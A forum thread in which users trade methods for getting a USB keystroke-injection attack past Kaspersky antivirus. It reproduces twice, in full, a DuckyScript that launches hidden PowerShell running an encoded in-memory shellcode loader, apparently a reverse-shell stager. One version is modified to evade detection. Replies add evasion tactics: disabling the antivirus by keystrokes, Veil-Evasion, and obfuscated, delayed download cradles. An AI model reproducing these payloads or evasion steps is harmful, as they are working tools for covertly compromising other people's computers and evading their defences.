Jump to content

Kaspersky blocks my ducky powershell payloads


Recommended Posts

Hi guys, i've tried to get past Kaspersky using my rubber ducky but all in vain. Immediately after the ducky writes out the payload i get an access denied and then Kaspersky pops up stating malicious activity. How can i get past this. Below is the script i used.

DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc JABPAFUAawAwACAAPQAgACcAJAB6AFEARQBDACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHoAUQBFAEMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADkALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMAAyACwAMAB4ADIAYwAsADAAeAAyADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGEALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeABlADMALAAwAHgAMwBjACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADQALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUAMgAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgANgAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADcAMwAsADAAeAAzADIALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIAOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMAA1ACwAMAB4ADYAOAAsADAAeABiADIALAAwAHgAMwBlACwAMAB4AGUAOQAsADAAeAAwADkALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGYAYgAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5ACwAMAB4AGEANQAsADAAeAA3ADQALAAwAHgANgAxACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAAwAHgAMwA2ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAAwAHgAOAA1ACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4AGMAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASAA4AFEAQQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASAA4AFEAQQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASAA4AFEAQQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE8AVQBrADAAKQApADsAJABDAFgARwA3ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAVABZADQAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVABZADQAIAAkAEMAWABHADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBYAEcANwAgACQAZQAiADsAfQA=
ENTER

 

 

Link to comment
Share on other sites

kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program in the normal system. I believe (though i don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why its getting detected. you might need to rewrite the payload somehow, but that could be very hard to do, I'm not sure.

Link to comment
Share on other sites

3 hours ago, axion said:

kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program in the normal system. I believe (though i don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why its getting detected. you might need to rewrite the payload somehow, but that could be very hard to do, I'm not sure.

But it's alpha numeric shellcode that i thought runs in memory without touching disk! You recommended rewriting the payload, do you have any references?

Thanks

Link to comment
Share on other sites

1 hour ago, nullcult said:

But it's alpha numeric shellcode that i thought runs in memory without touching disk!

because kaspersky is blocking it, im guessing its able to test powershell.exe being executed with the shellcode. or maybe it works by analyzing the process while its running in memory.

1 hour ago, nullcult said:

You recommended rewriting the payload, do you have any references?

I have no real idea how you would do this effectively, maybe ask google?
 

Link to comment
Share on other sites

Maybe this is too farfetched (I think Axion is right and you need to review your code) but.....

Maybe it's worth giving it a try and use Ducky to shut down Kaspersky first? After all they're just keystrokes. Open startmenu, open kaspersky console etc.

Link to comment
Share on other sites

Also, if this message you get from Kaspersky that says: suspicious activity detected, is there a button or option to allow it? Can't you use the duckyscript to choose that option? Just an idea...

Link to comment
Share on other sites

have you tried using Veil-Evasion.py    then use the ducky to run it   use something like ruby or python  shellcode wigs some antiviruses out

in some of my exploits that i have tried  let me know what you think

shellcode method can be awsome at time i would try veil-evasion first if that doesnt work  wich it should try a few of them like python rev_tcp

winth py installer option or the obfusgating option  ruby always works for me  avast doesnt see it ive not tried kaspersky but it should get around it

try veil and let me know how it worked for you  cheers!

Link to comment
Share on other sites

but i do like the idea  of not touching the hard disk thats awsome less chance of you geting caught if you ar going to use the shellcode method

try using the   venom shellcode generator  it works alot like veil-evasion ..

https://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/

 

https://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/

Link to comment
Share on other sites

this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it.

DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K
ENTER

 

Link to comment
Share on other sites

  • 3 weeks later...
  • 10 months later...
On 7/20/2016 at 5:12 PM, fugu said:

this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it.


DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K
ENTER

 

after STRING powershell -nop -win hidden  -noni -enc   then add shellcode .........can that be converted to digispark ....like using duckuino   converter??  

im having problems adding my shellcode due to lack of space on the digispark  is there any examples you can give me   i just need a small reverse_tcp script to run on the digispark   would you care to help me ?  some guys on here gave me a few examples but when i use msfvenom to generate the shellcode its  way to big  i need help either to make it smaller or another method all together  and plz keep in mind even tho ive been using metasploit 4 a while im still a noob with all of this rubberducky and digispark programming stuff  ...a copy and paste example would be nice lol  the saying goes bigger is always better lol not in this case i need smaller 

Link to comment
Share on other sites

Ohh, this one is going to be tough.  Don't use shellcode.  Instead, you will need to use metasploit's web download handler.  From that you just write a download cradle for metasploit script you are downloading and execute it.  Now you can modify the cradle to have a sleep if you like before running the real code.  Kaspersky will only watch it for so long.  To make it not look suspicious, have it do a gci of c:\ to null and maybe write some text to null before sleeping.  You may even have to obfuscate the downloader and executer part as a base64 string you can decode and execute to further obfuscate, maybe even dirty it up, if you are using the webclient for PS 2.0 compatability.  I notice the new Invoke-WebRequest doesn't seem to fire alarms.

You could use Powersploits Out-EncryptedScript script to create a function with encryption to encrypt but do the random junk and sleep before running it to fire off the downloader.

You may be able to even try your shellcode with the encrypted script with the random junk and sleep before unscrambling and firing it all off.

Avast does something similar when I have compiled .NET exes with obfuscated Powershell code inside.

 

